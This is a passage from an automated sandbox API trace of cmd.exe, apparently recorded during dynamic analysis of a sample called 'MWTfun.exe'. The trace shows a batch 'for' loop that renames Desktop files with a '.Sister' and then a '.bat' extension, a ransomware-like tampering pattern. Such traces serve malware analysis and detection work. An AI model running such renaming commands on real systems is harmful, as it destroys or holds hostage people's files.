nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xa6cf4fd960*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0192.630] ??_V@YAXPEAX@Z () returned 0x1 [0192.630] GetProcessHeap () returned 0x21ed8c70000 [0192.630] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x138) returned 0x21ed8d6b930 [0192.630] GetProcessHeap () returned 0x21ed8c70000 [0192.630] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8d6c340 [0192.630] GetProcessHeap () returned 0x21ed8c70000 [0192.630] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d6c340, Size=0x130) returned 0x21ed8d6c340 [0192.630] GetProcessHeap () returned 0x21ed8c70000 [0192.630] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d6c340) returned 0x130 [0192.630] malloc (_Size=0xffce) returned 0x21ed96dfdc0 [0192.630] ??_V@YAXPEAX@Z () returned 0x21ed96dfdc0 [0192.631] GetProcessHeap () returned 0x21ed8c70000 [0192.631] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8d65340 [0192.631] GetProcessHeap () returned 0x21ed8c70000 [0192.631] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed955b470 [0192.631] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0192.631] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0192.631] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0192.631] GetLastError () returned 0x2 [0192.631] GetProcessHeap () returned 0x21ed8c70000 [0192.631] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed99e0020 [0192.631] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed99e0030 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0192.632] SetErrorMode (uMode=0x0) returned 0x0 [0192.632] SetErrorMode (uMode=0x1) returned 0x0 [0192.632] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", nBufferLength=0x7fe7, lpBuffer=0x21ed96dfdc0, lpFilePart=0xa6cf4fd230 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", lpFilePart=0xa6cf4fd230*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister") returned 0x54 [0192.632] SetErrorMode (uMode=0x0) returned 0x1 [0192.632] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0192.632] GetProcessHeap () returned 0x21ed8c70000 [0192.632] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed9559250 [0192.632] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0192.632] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0192.632] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0192.632] GetLastError () returned 0x2 [0192.632] ??_V@YAXPEAX@Z () returned 0x1 [0192.632] malloc (_Size=0xffce) returned 0x21ed96dfdc0 [0192.632] ??_V@YAXPEAX@Z () returned 0x21ed96dfdc0 [0192.632] malloc (_Size=0xffce) returned 0x21ed96efda0 [0192.632] ??_V@YAXPEAX@Z () returned 0x21ed96efda0 [0192.632] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0192.633] GetLastError () returned 0x2 [0192.633] _get_osfhandle (_FileHandle=2) returned 0x54 [0192.633] GetFileType (hFile=0x54) returned 0x2 [0192.633] GetStdHandle (nStdHandle=0xfffffff4) returned 0x54 [0192.633] GetConsoleMode (in: hConsoleHandle=0x54, lpMode=0xa6cf4fd378 | out: lpMode=0xa6cf4fd378) returned 1 [0192.720] _get_osfhandle (_FileHandle=2) returned 0x54 [0192.720] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x54, lpConsoleScreenBufferInfo=0xa6cf4fd3b0 | out: lpConsoleScreenBufferInfo=0xa6cf4fd3b0) returned 1 [0192.821] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0192.822] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0xa6cf4fd450 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0192.822] WriteConsoleW (in: hConsoleOutput=0x54, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0xa6cf4fd3a0, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fd3a0*=0x2c) returned 1 [0192.948] longjmp () [0192.949] ??_V@YAXPEAX@Z () returned 0x1 [0192.949] FindNextFileW (in: hFindFile=0x21ed8c7cac0, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x20d91df0, ftCreationTime.dwHighDateTime=0x1d5e301, ftLastAccessTime.dwLowDateTime=0xf20b5d00, ftLastAccessTime.dwHighDateTime=0x1d5e4a7, ftLastWriteTime.dwLowDateTime=0xf20b5d00, ftLastWriteTime.dwHighDateTime=0x1d5e4a7, nFileSizeHigh=0x0, nFileSizeLow=0xd0e4, dwReserved0=0x0, dwReserved1=0xd8c00000, cFileName="Yc0pm06NSLlWRhlBhv0.wav", cAlternateFileName="")) returned 1 [0192.949] GetProcessHeap () returned 0x21ed8c70000 [0192.949] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d6c840, Size=0x4c4) returned 0x21ed8d6c840 [0192.949] GetProcessHeap () returned 0x21ed8c70000 [0192.949] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d6c840) returned 0x4c4 [0192.949] GetProcessHeap () returned 0x21ed8c70000 [0192.949] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9570170 [0192.949] GetProcessHeap () returned 0x21ed8c70000 [0192.949] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9570170, Size=0x30) returned 0x21ed9570170 [0192.949] GetProcessHeap () returned 0x21ed8c70000 [0192.949] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9570170) returned 0x30 [0192.949] GetProcessHeap () returned 0x21ed8c70000 [0192.949] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed95701b0 [0192.950] malloc (_Size=0x1ff9c) returned 0x21ed923fd00 [0192.951] GetProcessHeap () returned 0x21ed8c70000 [0192.951] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x40) returned 0x21ed8d6e3b0 [0192.951] ??_V@YAXPEAX@Z () returned 0x1 [0192.951] GetProcessHeap () returned 0x21ed8c70000 [0192.951] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed95701b0, Size=0x1f0) returned 0x21ed95701b0 [0192.951] GetProcessHeap () returned 0x21ed8c70000 [0192.951] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed95701b0) returned 0x1f0 [0192.951] GetProcessHeap () returned 0x21ed8c70000 [0192.951] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed95703b0 [0192.951] GetProcessHeap () returned 0x21ed8c70000 [0192.951] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed95703b0, Size=0x290) returned 0x21ed95703b0 [0192.951] GetProcessHeap () returned 0x21ed8c70000 [0192.951] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed95703b0) returned 0x290 [0192.951] GetProcessHeap () returned 0x21ed8c70000 [0192.951] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9570650 [0192.951] GetProcessHeap () returned 0x21ed8c70000 [0192.951] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9570650, Size=0x30) returned 0x21ed9570650 [0192.951] GetProcessHeap () returned 0x21ed8c70000 [0192.951] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9570650) returned 0x30 [0192.951] GetProcessHeap () returned 0x21ed8c70000 [0192.951] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9570690 [0192.952] malloc (_Size=0x1ff9c) returned 0x21ed923fd00 [0192.952] GetProcessHeap () returned 0x21ed8c70000 [0192.952] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x40) returned 0x21ed8d6e950 [0192.952] ??_V@YAXPEAX@Z () returned 0x1 [0192.952] malloc (_Size=0x1ff9c) returned 0x21ed923fd00 [0192.952] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x7, cFileName="Users", cAlternateFileName="")) returned 0x21ed8d65400 [0192.952] FindClose (in: hFindFile=0x21ed8d65400 | out: hFindFile=0x21ed8d65400) returned 1 [0192.952] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x7, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8d65400 [0192.952] FindClose (in: hFindFile=0x21ed8d65400 | out: hFindFile=0x21ed8d65400) returned 1 [0192.953] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x9cbb2587, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0x9cbb2587, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x7, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8d64c20 [0192.953] FindClose (in: hFindFile=0x21ed8d64c20 | out: hFindFile=0x21ed8d64c20) returned 1 [0192.953] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\Yc0pm06NSLlWRhlBhv0.wav", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x20d91df0, ftCreationTime.dwHighDateTime=0x1d5e301, ftLastAccessTime.dwLowDateTime=0xf20b5d00, ftLastAccessTime.dwHighDateTime=0x1d5e4a7, ftLastWriteTime.dwLowDateTime=0xf20b5d00, ftLastWriteTime.dwHighDateTime=0x1d5e4a7, nFileSizeHigh=0x0, nFileSizeLow=0xd0e4, dwReserved0=0x4, dwReserved1=0x7, cFileName="Yc0pm06NSLlWRhlBhv0.wav", cAlternateFileName="YC0PM0~1.WAV")) returned 0x21ed8d64c20 [0192.953] FindClose (in: hFindFile=0x21ed8d64c20 | out: hFindFile=0x21ed8d64c20) returned 1 [0192.953] _wcsnicmp (_String1="YC0PM0~1.WAV", _String2="Yc0pm06NSLlWRhlBhv0.wav", _MaxCount=0x17) returned 72 [0192.953] malloc (_Size=0x1ff9c) returned 0x21ed96ffd80 [0192.954] ??_V@YAXPEAX@Z () returned 0x21ed96ffd80 [0192.955] GetProcessHeap () returned 0x21ed8c70000 [0192.955] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x38) returned 0x21ed937b270 [0192.955] ??_V@YAXPEAX@Z () returned 0x1 [0192.955] ??_V@YAXPEAX@Z () returned 0x1 [0192.955] GetProcessHeap () returned 0x21ed8c70000 [0192.955] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9570690, Size=0x1f0) returned 0x21ed9570690 [0192.956] GetProcessHeap () returned 0x21ed8c70000 [0192.956] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9570690) returned 0x1f0 [0192.956] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0192.956] _get_osfhandle (_FileHandle=1) returned 0x50 [0192.956] GetFileType (hFile=0x50) returned 0x2 [0192.956] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0192.956] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0193.028] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.028] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0193.109] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0193.109] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0193.109] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0193.109] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.109] GetFileType (hFile=0x50) returned 0x2 [0193.109] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0193.109] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0193.277] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.277] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x18) returned 1 [0193.350] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.350] GetFileType (hFile=0x50) returned 0x2 [0193.350] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0193.350] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0193.427] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.427] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed9570180*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed9570180*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0193.510] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"Yc0pm06NSLlWRhlBhv0.wav\" \"Yc0pm06NSLlWRhlBhv0.wav.Sister\" ") returned 60 [0193.510] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.510] GetFileType (hFile=0x50) returned 0x2 [0193.510] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0193.510] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0193.587] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.587] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3c, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x3c) returned 1 [0193.662] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe558 | out: _Buffer=" & ") returned 3 [0193.662] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.662] GetFileType (hFile=0x50) returned 0x2 [0193.662] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0193.662] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0193.820] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.820] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0193.917] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0xa6cf4fe528 | out: _Buffer="for") returned 3 [0193.917] _get_osfhandle (_FileHandle=1) returned 0x50 [0193.917] GetFileType (hFile=0x50) returned 0x2 [0193.917] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0193.917] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0194.225] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.225] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x3) returned 1 [0194.360] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" %a in ") returned 7 [0194.360] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.360] GetFileType (hFile=0x50) returned 0x2 [0194.360] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0194.360] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0194.513] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.513] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x7) returned 1 [0194.644] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0xa6cf4fe528 | out: _Buffer="(\"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe\") do ") returned 85 [0194.644] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.644] GetFileType (hFile=0x50) returned 0x2 [0194.644] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0194.644] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0194.737] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.737] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x55, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x55) returned 1 [0194.899] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.899] GetFileType (hFile=0x50) returned 0x2 [0194.899] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0194.899] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0195.001] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.001] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed9570660*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed9570660*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0195.073] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"Yc0pm06NSLlWRhlBhv0.wav.Sister\" \"Yc0pm06NSLlWRhlBhv0.bat\" ") returned 60 [0195.073] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.073] GetFileType (hFile=0x50) returned 0x2 [0195.073] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0195.073] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0195.245] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.245] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3c, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x3c) returned 1 [0195.328] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0195.328] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.328] GetFileType (hFile=0x50) returned 0x2 [0195.328] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0195.328] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0195.400] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.400] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0195.476] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe240, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0195.584] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0195.584] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0195.584] malloc (_Size=0xffce) returned 0x21ed96ffd80 [0195.584] ??_V@YAXPEAX@Z () returned 0x21ed96ffd80 [0195.584] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0195.584] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0195.584] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0195.584] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0195.584] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0195.584] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0195.584] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0195.584] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0195.584] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0195.584] ??_V@YAXPEAX@Z () returned 0x1 [0195.584] GetProcessHeap () returned 0x21ed8c70000 [0195.584] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x100) returned 0x21ed937be50 [0195.584] GetProcessHeap () returned 0x21ed8c70000 [0195.584] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed937be50, Size=0x88) returned 0x21ed937be50 [0195.585] GetProcessHeap () returned 0x21ed8c70000 [0195.585] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed937be50) returned 0x88 [0195.585] GetProcessHeap () returned 0x21ed8c70000 [0195.585] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x90) returned 0x21ed937a220 [0195.585] GetProcessHeap () returned 0x21ed8c70000 [0195.585] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x100) returned 0x21ed955d2b0 [0195.585] GetProcessHeap () returned 0x21ed8c70000 [0195.585] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed955d2b0, Size=0x88) returned 0x21ed955d2b0 [0195.585] GetProcessHeap () returned 0x21ed8c70000 [0195.585] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed955d2b0) returned 0x88 [0195.585] malloc (_Size=0xffce) returned 0x21ed96ffd80 [0195.585] ??_V@YAXPEAX@Z () returned 0x21ed96ffd80 [0195.585] GetProcessHeap () returned 0x21ed8c70000 [0195.585] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8d64c20 [0195.585] GetProcessHeap () returned 0x21ed8c70000 [0195.585] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed9559730 [0195.585] _wcsicmp (_String1="Yc0pm06NSLlWRhlBhv0.wav", _String2=".") returned 75 [0195.585] _wcsicmp (_String1="Yc0pm06NSLlWRhlBhv0.wav", _String2="..") returned 75 [0195.585] GetFileAttributesW (lpFileName="Yc0pm06NSLlWRhlBhv0.wav" (normalized: "c:\\users\\fd1hvy\\desktop\\yc0pm06nsllwrhlbhv0.wav")) returned 0x20 [0195.586] GetProcessHeap () returned 0x21ed8c70000 [0195.586] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed99f0010 [0195.588] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed99f0020 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0195.588] SetErrorMode (uMode=0x0) returned 0x0 [0195.588] SetErrorMode (uMode=0x1) returned 0x0 [0195.588] GetFullPathNameW (in: lpFileName="Yc0pm06NSLlWRhlBhv0.wav", nBufferLength=0x7fe7, lpBuffer=0x21ed96ffd80, lpFilePart=0xa6cf4fd660 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\Yc0pm06NSLlWRhlBhv0.wav", lpFilePart=0xa6cf4fd660*="Yc0pm06NSLlWRhlBhv0.wav") returned 0x2f [0195.588] SetErrorMode (uMode=0x0) returned 0x1 [0195.588] GetProcessHeap () returned 0x21ed8c70000 [0195.588] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed955c310 [0195.588] _wcsicmp (_String1="Yc0pm06NSLlWRhlBhv0.wav", _String2=".") returned 75 [0195.588] _wcsicmp 